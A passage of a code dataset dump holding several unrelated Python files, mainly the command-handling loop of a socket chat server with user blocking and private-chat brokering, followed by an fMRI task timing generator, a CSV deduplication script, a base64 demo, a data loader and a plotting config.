{}, Your account has been blocked!'.format((user['account-blocked'] + datetime.timedelta(seconds=block_duration)).strftime(\"%H:%M:%S.%f\")[:-3], credentials[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n \n # user will have username, user_header and block duration\n user['data'] = credentials[0].encode()\n\n # add user to block account list\n blocked_clients[client_socket] = user\n\n break\n # Invalid password, prompt the sender to try again\n else:\n result = result + ' retry count: {}'.format(user['retry'])\n message = result.encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n else:\n message = result.encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n # --- Authentication end ---\n\n # Else existing socket is sending a message\n # After successful authentication, the server starts sending user and message (both with their headers)\n # server will reuse message header sent by sender for certain commands like message, broadcasting, etc\n elif notified_socket in online_clients and notified_socket not in blocked_clients:\n # else:\n \n # Receive message\n message = receive_message(notified_socket)\n\n # If False, client disconnected, cleanup\n if message is False:\n print('Closed connection from: {}'.format(online_clients[notified_socket]['data'].decode().split(',')[0]))\n\n # add to offline user list\n if notified_socket not in offline_clients:\n offline_clients[notified_socket] = online_clients[notified_socket]\n\n # Remove from list for socket.socket()\n sockets_list.remove(notified_socket)\n\n # Remove from our list of online users\n del online_clients[notified_socket]\n\n continue\n\n # Get user by notified socket, so we will know who sent the message\n user = online_clients[notified_socket]\n\n if user is False:\n continue\n\n user['last-active'] = datetime.datetime.now()\n\n print('Received message at {} from {}: {}'.format(user['last-active'].strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3], user[\"data\"].decode().split(',')[0], message[\"data\"].decode()))\n\n
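# Supported commands: broadcast, whoelse, whoelsesince, message, block,\n # unblock, logout, startprivate; anything else falls through to 'Invalid Command'.\n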
# --- Commands start ---\n command = message[\"data\"].decode().split(' ')[0]\n # --- broadcast start ---\n if command == 'broadcast':\n check = message['data'].decode().split(' ')\n if len(check) >= 2:\n message['data'] = message['data'].decode().split(' ', 1)[1].encode()\n # Iterate over online users and broadcast message\n exist = False\n for client_socket in online_clients:\n blocked = False\n # But don't send it to the sender\n if client_socket != notified_socket:\n # check if user is in my block list\n if 'blocked-user' in online_clients[notified_socket]:\n for i in range(len(online_clients[notified_socket]['blocked-user'])):\n if online_clients[client_socket]['data'] == online_clients[notified_socket]['blocked-user'][i]['data']:\n exist = True\n blocked = True\n break\n # check if I'm in the user's block list\n if 'blocked-user' in online_clients[client_socket]:\n for i in range(len(online_clients[client_socket]['blocked-user'])):\n if online_clients[notified_socket]['data'] == online_clients[client_socket]['blocked-user'][i]['data']:\n exist = True\n blocked = True\n break\n if not blocked:\n client_socket.send(user['header'] + user['data'] + message['header'] + message['data'])\n if exist:\n print('{} some users will not get the broadcast!'.format(user['data'].decode().split(',')[0]))\n message = 'some users will not get the broadcast, {}!'.format(user['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n break\n else:\n print('FAIL: No message to broadcast, {}'.format(online_clients[notified_socket]['data'].decode().split(',')[0]))\n message = 'No message to broadcast, {}'.format(online_clients[notified_socket]['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # --- broadcast end ---\n\n # --- whoelse start ---\n elif command == 'whoelse':\n check = message['data'].decode().split(' ')\n if len(check) == 1:\n # checks online user list\n for client_socket in online_clients:\n if client_socket != notified_socket and client_socket not in blocked_clients:\n message = '{} is online!'.format(online_clients[client_socket]['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n else:\n print('FAIL: whoelse needs no args, {}'.format(online_clients[notified_socket]['data'].decode().split(',')[0]))\n message = 'whoelse needs no args, {}'.format(online_clients[notified_socket]['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # --- whoelse end ---\n\n # --- whoelsesince start ---\n elif command == 'whoelsesince':\n check = message['data'].decode().split(' ')\n if len(check) == 2:\n # checks online user list\n for client_socket in online_clients:\n current_time = datetime.datetime.now()\n sec = message['data'].decode()\n sec = int(sec.split(' ')[1])\n t = online_clients[client_socket]['logged-in'] + datetime.timedelta(seconds=sec)\n # if not self and user is not blocked and user is not offline\n if client_socket != notified_socket and client_socket not in blocked_clients and client_socket not in offline_clients:\n # if the user's logged-in time plus the window is at or after the current time, display the user\n if t >= current_time:\n msg = '{} IS online, last active: {}!'.format(online_clients[client_socket]['data'].decode().split(',')[0], online_clients[client_socket]['last-active'].strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]).encode()\n message_header = f\"{len(msg):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + msg)\n # checks offline user list\n for client_socket in offline_clients:\n current_time = datetime.datetime.now()\n sec = message['data'].decode()\n sec = int(sec.split(' ')[1])\n t = offline_clients[client_socket]['logged-in'] + datetime.timedelta(seconds=sec)\n # if not self and user is not blocked and user is not online\n if client_socket != notified_socket and client_socket not in blocked_clients and client_socket not in online_clients:\n # if the user's logged-in time plus the window is at or after the current time, display the user\n if t >= current_time:\n msg = '{} WAS online, last active: {}!'.format(offline_clients[client_socket]['data'].decode().split(',')[0], offline_clients[client_socket]['last-active'].strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]).encode()\n message_header = f\"{len(msg):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + msg)\n else:\n print('FAIL: Insufficient Args or Too Many Args, 
{}'.format(online_clients[notified_socket]['data'].decode().split(',')[0]))\n message = 'Error, Insufficient Args or Too Many Args, {}'.format(online_clients[notified_socket]['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # --- whoelsesince end ---\n\n # --- message start ---\n elif command == 'message':\n check = message['data'].decode().split(' ')\n if len(check) < 3:\n print('FAIL: Insufficient Args, {}!'.format(online_clients[notified_socket]['data'].decode().split(',')[0]))\n message = 'Error, Insufficient Args, {}!'.format(online_clients[notified_socket]['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n else:\n # if self fail\n if check[1] == user['data'].decode().split(',')[0]:\n print('FAIL: {} can\\'t MESSAGE SELF!'.format(check[1]))\n message = 'Error, can\\'t MESSAGE SELF: {}!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n else:\n recipient = message['data'].decode().split(' ')[1]\n msg = message['data'].decode().split(' ', 2)[2]\n\n if user_exists(username=recipient, on9clients=online_clients, off9clients=offline_clients):\n # check if recipient is online\n for client_socket in online_clients:\n if client_socket != notified_socket and online_clients[client_socket]['data'].decode().split(',')[0] == recipient:\n # if send successful sender will NOT get notified\n if user_blocked(my_socket=notified_socket, on9clients=online_clients, off9clients=offline_clients):\n message = 'Error, can\\'t send message to: {}! 
*{} blocked you...'.format(recipient, recipient).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n else:\n print('on9 MESSAGE sent to {} from {}'.format(recipient, user['data'].decode().split(',')[0]))\n msg = msg.strip().encode()\n message_header = f\"{len(msg):<{20}}\".encode()\n client_socket.send(user['header'] + user['data'] + message_header + msg)\n # check if recipient is offline\n for client_socket in offline_clients:\n if client_socket != notified_socket and offline_clients[client_socket]['data'].decode().split(',')[0] == recipient:\n # if send successful sender will get notified\n if not user_blocked(my_socket=notified_socket, on9clients=online_clients, off9clients=offline_clients):\n msg = msg.strip().encode()\n # message_header = f\"{len(msg):<{20}}\".encode()\n # client_socket.send(user['header'] + user['data'] + message_header + msg)\n if client_socket in offline_messages:\n offline_messages[client_socket].append({'sender_header': user['header'], 'sender': user['data'], 'recipient': offline_clients[client_socket]['data'], 'message':msg })\n else:\n offline_messages[client_socket] = [{'sender_header': user['header'], 'sender': user['data'], 'recipient': offline_clients[client_socket]['data'], 'message':msg }]\n print('off9 MESSAGE sent to {} from {}'.format(recipient, user['data'].decode().split(',')[0]))\n message = 'sent message to: {} successful!'.format(recipient).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n else:\n print(f'off9 MESSAGE FAIL: can\\'t send to {recipient}')\n message = 'Error, can\\'t send offline message to: {}! *{} blocked you...'.format(recipient, recipient).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # if user in credentials.txt but never log in\n # if user not in credentials.txt\n else:\n print('FAIL: {} doesn\\'t exist!'.format(check[1]))\n message = 'Error, {} doesn\\'t exist!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # --- message end ---\n\n # --- block start ---\n elif command == 'block':\n check = message['data'].decode().split(' ')\n if len(check) == 2:\n # if self fail\n if check[1] == user['data'].decode().split(',')[0]:\n print('{} can\\'t BLOCK SELF!'.format(check[1]))\n message = 'can\\'t BLOCK SELF: {}!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # checks if user exist\n elif user_exists(username=check[1], on9clients=online_clients, off9clients=offline_clients):\n # checks my block list if user is online\n for client_socket in online_clients:\n if client_socket != notified_socket and online_clients[client_socket]['data'].decode().split(',')[0] == check[1]:\n if 'blocked-user' not in online_clients[notified_socket]:\n online_clients[notified_socket]['blocked-user'] = [online_clients[client_socket]]\n else:\n # check if user in my block list\n exist = False\n for i in range(len(online_clients[notified_socket]['blocked-user'])):\n if check[1] == online_clients[notified_socket]['blocked-user'][i]['data'].decode().split(',')[0]:\n print('{} already BLOCKED USER: {}!'.format(user['data'].decode().split(',')[0], 
check[1]))\n message = 'already BLOCKED USER: {}!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n exist = True\n break\n if exist:\n break\n\n online_clients[notified_socket]['blocked-user'].append(online_clients[client_socket])\n \n print('{} BLOCKED USER: {}!'.format(user['data'].decode().split(',')[0], online_clients[client_socket]['data'].decode().split(',')[0]))\n message = 'BLOCKED USER: {}!'.format(online_clients[client_socket]['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n break\n # checks my block list if user is offline\n for client_socket in offline_clients:\n if client_socket != notified_socket and offline_clients[client_socket]['data'].decode().split(',')[0] == check[1]:\n if 'blocked-user' not in online_clients[notified_socket]:\n online_clients[notified_socket]['blocked-user'] = [offline_clients[client_socket]]\n else:\n exist = False\n for i in range(len(online_clients[notified_socket]['blocked-user'])):\n if check[1] == online_clients[notified_socket]['blocked-user'][i]['data'].decode().split(',')[0]:\n print('{} already BLOCKED USER: {}!'.format(user['data'].decode().split(',')[0], check[1]))\n message = 'already BLOCKED USER: {}!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n exist = True\n break\n if exist:\n break\n online_clients[notified_socket]['blocked-user'].append(offline_clients[client_socket])\n print('{} BLOCKED USER: {}!'.format(user['data'].decode().split(',')[0], offline_clients[client_socket]['data'].decode().split(',')[0]))\n message = 'BLOCKED USER: {}!'.format(offline_clients[client_socket]['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n break\n # if user in credentials.txt but never log in\n # if user not in credentials.txt\n else:\n print('FAIL: {} doesn\\'t exist!'.format(check[1]))\n message = 'Error, {} doesn\\'t exist!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n else:\n print('FAIL: Insufficient Args: {}!'.format(user['data'].decode().split(',')[0]))\n message = 'Error, Insufficient Args: {}!'.format(user['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # --- block end ---\n\n # --- unblock start ---\n elif command == 'unblock':\n check = message['data'].decode().split(' ')\n if len(check) == 2:\n # if self fail\n if check[1] == user['data'].decode().split(',')[0]:\n print('{} can\\'t UNBLOCK SELF!'.format(check[1]))\n message = 'can\\'t UNBLOCK SELF: {}!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n break\n\n # checks my blocked user list\n for client_socket in online_clients:\n if 'blocked-user' in online_clients[notified_socket]:\n # blocked-user is an array of dicts\n for i in range(len(online_clients[notified_socket]['blocked-user'])):\n if check[1] == 
online_clients[notified_socket]['blocked-user'][i]['data'].decode().split(',')[0]:\n print('{} UNBLOCKED USER: {}!'.format(user['data'].decode().split(',')[0], check[1]))\n message = 'UNBLOCKED USER: {}!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n del online_clients[notified_socket]['blocked-user'][i]\n break\n else:\n print('FAIL: could not unblock {}!'.format(check[1]))\n message = 'Error, failed to unblock {}!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n break\n else:\n print('FAIL: Insufficient Args or Too Many Args: {}!'.format(user['data'].decode().split(',')[0]))\n message = 'Error, Insufficient Args or Too Many Args: {}!'.format(user['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # --- unblock end ---\n\n # --- logout start ---\n elif command == 'logout':\n check = message['data'].decode().split(' ')\n if len(check) == 1:\n current_time = datetime.datetime.now()\n user['last-active'] = current_time\n\n print('Connection closed for: {} at {}'.format(user['data'].decode().split(',')[0], current_time.strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]))\n message = 'Logged out at {} Bye!'.format(current_time.strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n\n # broadcast log out message\n for client_socket in online_clients:\n blocked = False\n # But don't send it to the sender\n if client_socket != notified_socket:\n # check if user is in my block list\n if 'blocked-user' in online_clients[notified_socket]:\n for i in range(len(online_clients[notified_socket]['blocked-user'])):\n if online_clients[client_socket]['data'] == online_clients[notified_socket]['blocked-user'][i]['data']:\n exist = True\n blocked = True\n break\n # check if I'm in the user's block list\n if 'blocked-user' in online_clients[client_socket]:\n for i in range(len(online_clients[client_socket]['blocked-user'])):\n if online_clients[notified_socket]['data'] == online_clients[client_socket]['blocked-user'][i]['data']:\n exist = True\n blocked = True\n break\n if not blocked:\n message = '{} logged out at {}'.format(user['data'].decode().split(',')[0], user['last-active'].strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(user['header'] + user['data'] + message_header + message)\n\n # add to logged out list\n offline_clients[notified_socket] = online_clients[notified_socket]\n\n # Remove from list for socket.socket()\n sockets_list.remove(notified_socket)\n\n # Remove from our list of users\n del online_clients[notified_socket]\n\n # send indication of termination to client\n notified_socket.shutdown(SHUT_RDWR)\n notified_socket.close()\n else:\n print('FAIL: Too many Args: {}!'.format(user['data'].decode().split(',')[0]))\n message = 'Error, Too many Args: {}!'.format(user['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # --- logout end ---\n\n
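# NOTE: startprivate only brokers the peer's address - the server replies\n # with 'Connecting <ip> <port>' and the P2P connection itself is expected\n # to be opened on the client side.\n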
# FIXME --- P2P commands start---\n elif command == 'startprivate':\n check = message['data'].decode().split(' ')\n if len(check) == 2:\n if check[1] == user['data'].decode().split(',')[0]:\n print('{} can\'t startprivate SELF!'.format(check[1]))\n message = 'can\'t startprivate SELF: {}!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n break\n # check if user is online and not offline\n if user_exists(username=check[1], on9clients=online_clients, off9clients=offline_clients):\n if user_exists_On9clients(username=check[1], on9clients=online_clients) and not user_exists_Off9clients(username=check[1], off9clients=offline_clients):\n for client_socket in online_clients:\n if online_clients[client_socket]['data'].decode().split(',')[0] == user['data'].decode().split(',')[0]:\n continue\n if online_clients[client_socket]['data'].decode().split(',')[0] == check[1]:\n print('TO CONNECT {}:{}'.format(*online_clients[client_socket]['private-connection']))\n print('notified_socket: {}:{}'.format(*online_clients[notified_socket]['private-connection']))\n # notified_socket.connect(online_clients[client_socket]['private-connection'])\n # new_user = user['data'].decode().split(',')[0].encode()\n # new_user_header = f\"{len(new_user):<{20}}\".encode()\n # message = f'{client_socket}'\n message = \"Connecting {} {}\".format(online_clients[client_socket]['private-connection'][0], online_clients[client_socket]['private-connection'][1]).encode()\n # message = \"{} {} Please accept my connection from {} : {}\".format(client_socket, online_clients[client_socket]['data'].decode().split(',')[0], online_clients[notified_socket]['private-connection'][0], online_clients[notified_socket]['private-connection'][1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # client_socket.send(user['header'] + user['data'] + message_header + message)\n else:\n print('FAIL: {} not online!'.format(check[1]))\n message = 'Error, {} not online!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # if user is in credentials.txt but never logged in\n # if user is not in credentials.txt\n else:\n print('FAIL: {} doesn\'t exist!'.format(check[1]))\n message = 'Error, {} doesn\'t exist!'.format(check[1]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n else:\n print('FAIL: Insufficient Args or Too Many Args: {}!'.format(user['data'].decode().split(',')[0]))\n message = 'Error, Insufficient Args or Too Many Args: {}!'.format(user['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n\n # --- P2P commands end ---\n\n # --- default ---\n else:\n print('FAIL: Invalid Command, {}!'.format(user['data'].decode().split(',')[0]))\n message = 'Error, Invalid Command, {}!'.format(user['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # --- Commands end ---\n\n # It's not really necessary to have this, but will handle some socket exceptions just in case\n for notified_socket in exception_sockets:\n\n # Remove from list for socket.socket()\n 
sockets_list.remove(notified_socket)\n\n # Remove from online list of users\n del online_clients[notified_socket]","sub_path":"ass/OLD_WORKING/server copy.py","file_name":"server copy.py","file_ext":"py","file_size_in_byte":48475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"590730518","text":"\"\"\"\nSlow event-related design for HRF estimation for M1, V1, and A1.\n\nSingle-run task that includes the following conditions:\n- flashing checkerboard\n- finger tapping\n- listening to tones/music\n\nOriginally created by Jakub Kaczmarzyk and adapted to combine tasks.\n\"\"\"\n\nfrom __future__ import division, print_function\nimport os.path as op\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import gumbel_r\n\n# These tracks come from freepd.com and were converted from mp3 to wav\n# Some files have been shortened to reduce low-volume intros\n_AUDIO_FILES = [\n 'audio/Ambush_in_Rattlesnake_Gulch.wav',\n 'audio/Bleu.wav',\n 'audio/Bollywood_Groove.wav',\n 'audio/Breaking_Bollywood.wav',\n 'audio/Coy_Koi.wav',\n 'audio/Cumbish.wav',\n 'audio/Desert_Conflict.wav',\n 'audio/Funshine.wav',\n 'audio/Improv_for_Evil.wav', # starts at 4s\n 'audio/Jack_The_Lumberer.wav', # starts at 2.5s\n 'audio/Le_Baguette.wav', # starts at 1s\n 'audio/Shenzhen_Nightlife.wav',\n 'audio/Stereotype_News.wav', # starts at 1.5s\n 'audio/Ukulele_Song.wav']\n\n# General constants\nTOTAL_DURATION = 450\nTASK_TIME = 438 # time for trials in task\nLEAD_IN_DURATION = 6 # fixation before trials\nCONDITIONS = ['visual', 'visual/auditory', 'motor', 'motor/auditory']\nN_CONDS = len(CONDITIONS) # audio, checkerboard, tapping\n\n# Detection task constants\nN_BLOCKS_PER_COND = 4 # for each condition, for detection task\nBLOCK_TRIAL_DUR = 14\nBLOCK_ITI_DUR = 14\n\n# Estimation task constants\nN_TRIALS_PER_COND = 15 # for each condition, for estimation task\nN_TRIALS_TOTAL = N_TRIALS_PER_COND * N_CONDS\nDUR_RANGE = (0.5, 4) # avg of 3s\nITI_RANGE = (2, 8) # max determined to minimize difference from TASK_TIME\n\n\ndef randomize_carefully(elems, n_repeat=2):\n \"\"\"\n Shuffle without consecutive duplicates\n From https://stackoverflow.com/a/22963275/2589328\n \"\"\"\n s = set(elems)\n res = []\n for n in range(n_repeat):\n if res:\n # Avoid the last placed element\n lst = list(s.difference({res[-1]}))\n # Shuffle\n np.random.shuffle(lst)\n lst.append(res[-1])\n # Shuffle once more to avoid obvious repeating patterns in the last position\n lst[1:] = np.random.choice(lst[1:], size=len(lst)-1, replace=False)\n else:\n lst = elems[:]\n np.random.shuffle(lst)\n res.extend(lst)\n return res\n\n\ndef determine_detection_timing():\n \"\"\"\n Generates dataframe with timing info for block design version of task.\n \"\"\"\n durs = [BLOCK_TRIAL_DUR] * N_BLOCKS_PER_COND * N_CONDS\n itis = [BLOCK_ITI_DUR] * N_BLOCKS_PER_COND * N_CONDS\n trial_types = randomize_carefully(CONDITIONS, N_BLOCKS_PER_COND)\n timing_dict = {\n 'duration': durs,\n 'iti': itis,\n 'trial_type': trial_types,\n }\n timing_df = pd.DataFrame(timing_dict)\n return timing_df\n\n\ndef determine_estimation_timing(seed=None):\n \"\"\"\n Generates dataframe with timing info for event-related version of task.\n \"\"\"\n mu = 4 # mean of 4s\n raw_itis = gumbel_r.rvs(size=100000, loc=mu, scale=1)\n possible_itis = np.round(raw_itis, 1)\n # crop to 2-8s\n possible_itis = possible_itis[possible_itis >= 2]\n possible_itis = possible_itis[possible_itis <= 8]\n\n missing_time = np.finfo(dtype='float64').max\n if not 
seed:\n seed = np.random.randint(1000, 9999)\n\n while (not np.isclose(missing_time, 0.0, atol=10)) or (missing_time < 0):\n state = np.random.RandomState(seed=seed)\n durations = state.uniform(DUR_RANGE[0], DUR_RANGE[1], N_TRIALS_TOTAL)\n durations = np.round(durations, 1)\n\n itis = state.choice(possible_itis, size=N_TRIALS_TOTAL, replace=True)\n missing_time = TASK_TIME - np.sum([durations.sum(), itis.sum()])\n seed += 1\n\n trial_types = randomize_carefully(CONDITIONS, N_TRIALS_PER_COND)\n timing_dict = {\n 'duration': durations,\n 'iti': itis,\n 'trial_type': trial_types,\n }\n timing_df = pd.DataFrame(timing_dict)\n return timing_df, seed\n\n\ndef determine_timing(ttype, seed=None):\n if ttype not in ['Detection', 'Estimation']:\n raise Exception()\n\n n_audio_trials = N_TRIALS_PER_COND * len([k for k in CONDITIONS if 'auditory' in k])\n n_audio_stimuli = len(_AUDIO_FILES)\n n_repeats = int(np.ceil(n_audio_trials / n_audio_stimuli))\n audio_files = _AUDIO_FILES * n_repeats\n # Sampling method chosen to make number of dupes as equal as possible\n audio_files = np.random.choice(audio_files, n_audio_trials, replace=False)\n\n # set order of trials\n if ttype == 'Estimation':\n timing_df, seed = determine_estimation_timing(seed=seed)\n elif ttype == 'Detection':\n timing_df = determine_detection_timing()\n\n c = 0\n for trial in timing_df.index:\n if 'auditory' in timing_df.loc[trial, 'trial_type']:\n timing_df.loc[trial, 'stim_file'] = audio_files[c]\n c += 1\n else:\n timing_df.loc[trial, 'stim_file'] = None\n return timing_df, seed\n\n\ndef main():\n n_files = 100\n ttypes = ['Detection', 'Estimation']\n out_dir = op.realpath('../config/')\n seed = 1\n for i_file in range(1, n_files+1):\n for ttype in ttypes:\n df, seed = determine_timing(ttype, seed=seed)\n df.to_csv(op.join(out_dir, 'config_{0}_{1:05d}.tsv'.format(ttype, i_file)),\n sep='\\t', index=False, float_format='%.1f')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"task_preparation/generate_config_files.py","file_name":"generate_config_files.py","file_ext":"py","file_size_in_byte":5505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"159795955","text":"import csv\n\nfull_urls = list()\n\nwith open('unique.csv') as f:\n reader = csv.reader(f)\n for row in reader:\n full_urls.append(row[-1].lower())\n\n\n\nwith open('unique.csv', 'a') as ff:\n writer = csv.writer(ff)\n\n with open('artist.csv') as f:\n reader = csv.reader(f)\n for row in reader:\n if row[-1].lower() not in full_urls:\n full_urls.append(row[-1].lower())\n writer.writerow(row)\n","sub_path":"unique/unique.py","file_name":"unique.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"223730146","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport base64\n\n\ndef main():\n original_data = b\"This is the data, in the clear.\"\n print(\"Original : {} bytes {!r}\".format(len(original_data), original_data))\n\n b64_data = base64.b64encode(original_data)\n print(\"b64 Encoded: {} bytes {!r}\".format(len(b64_data), b64_data))\n\n b85_data = base64.b85encode(original_data)\n print(\"b85 Encoded: {} bytes {!r}\".format(len(b85_data), b85_data))\n\n a85_data = base64.a85encode(original_data)\n print(\"a85 Encoded: {} bytes {!r}\".format(len(a85_data), a85_data))\n\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"standard/060.base64/base64_base85.py","file_name":"base64_base85.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"261768721","text":"from scipy.io import loadmat\n\n#### DATA PARAMETERS\nCLEAN_DATA_STUDENTS = \"data/cleandata_students.mat\"\nNOISY_DATA_STUDENTS = \"data/noisydata_students.mat\"\nNUM_ATTRIBUTES = 45\nATTRIBUTE_NUM_VALUES = 2 # we are dealing with binary numbers\nNUM_CLASSES = 6\n\n\n##### PART I: LOADING DATA\ndef load_data(filename):\n \"\"\" Returns the labels and examples array from the matlab with the given filename\"\"\"\n\n # load raw data\n mat = loadmat(filename, squeeze_me = True)\n\n # extract labels and examples from raw data\n examples = mat['x'] # N examples of 45 attributes each.\n labels = mat['y'] # N labels\n \n return examples, labels\n\n\ndef get_binary_targets(labels, label_index):\n \"\"\" Returns a list remapping labels according to the given label_index corresponding to an\n and emotion. A 1 indicates a positive example at that index & a 0 indicates a negative\n example.\n @params:\n labels: a list of the labels of the corresponding examples. Labels are numbered 1 to 6, the same as\n the total number of emotions.\n label_index : the emotion you want to map labels to.\"\"\"\n\n return map(lambda label: int(label == label_index), labels)\n\n","sub_path":"src/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"174043903","text":"#variables = {}\n\n# imported from cuts.py\n# cuts\n# imported from samples.py\n# samples signals\n\ntry:\n variables\nexcept NameError:\n import collections\n variables = collections.OrderedDict()\n cuts = []\n\nsr = [ckey for ckey in cuts if '_CR' not in ckey]\ncr = [ckey for ckey in cuts if '_CR' in ckey]\n\nnosignal = [skey for skey in samples if skey not in signals]\n\n#'fold' : # 0 = not fold (default), 1 = fold underflowbin, 2 = fold overflow bin, 3 = fold underflow and overflow\n\nvariables['events'] = {\n 'name': '0.5',\n 'range': (1,0,1),\n 'xaxis': 'events'\n}\n\nmthbinning = [60,80,90,100,110,120,130,150,200]\nmllbinning = [10,25,35,40,45,50,55,70,90,210]\nname = ''\nmllbin = ['1'] # folding underflow -> always 1\nfor imll in range(1, len(mllbinning) - 1):\n mllbin.append('(mll >= %d)' % mllbinning[imll])\nname += '+'.join(mllbin)\nname += ' + %d*(' % (len(mllbinning) - 1)\nmthbin = [] # 1-1 for first bin\nfor imth in range(1, len(mthbinning) - 1):\n mthbin.append('(mth >= %d)' % mthbinning[imth])\nname += '+'.join(mthbin)\nname += ') - 0.5'\n\nvariables['mllVSmth_8x9'] = {\n 'name': name,\n 'range': (72, 0., 72.),\n 'xaxis': 'm^{ll}:m_{T}^{H}', # x axis name\n 'doWeight': 1, # do weighted plot too\n 'cuts': sr\n}\n\nmthbinning = [60,80,90,110,130,150,200]\nmllbinning = [10,25,40,50,70,90,210]\nname = ''\nmllbin = ['1'] # folding underflow -> always 1\nfor imll in range(1, len(mllbinning) - 1):\n mllbin.append('(mll >= %d)' % mllbinning[imll])\nname += '+'.join(mllbin)\nname += ' + %d*(' % (len(mllbinning) - 1)\nmthbin = [] # 1-1 for first bin\nfor imth in range(1, len(mthbinning) - 1):\n mthbin.append('(mth >= %d)' % mthbinning[imth])\nname += '+'.join(mthbin)\nname += ') - 0.5'\n\nvariables['mllVSmth_6x6'] = {\n 'name': name,\n 'range': (36, 0., 36.),\n 'xaxis': 'm^{ll}:m_{T}^{H}', # x axis name\n 'doWeight': 1, # do weighted plot too\n 'cuts': 
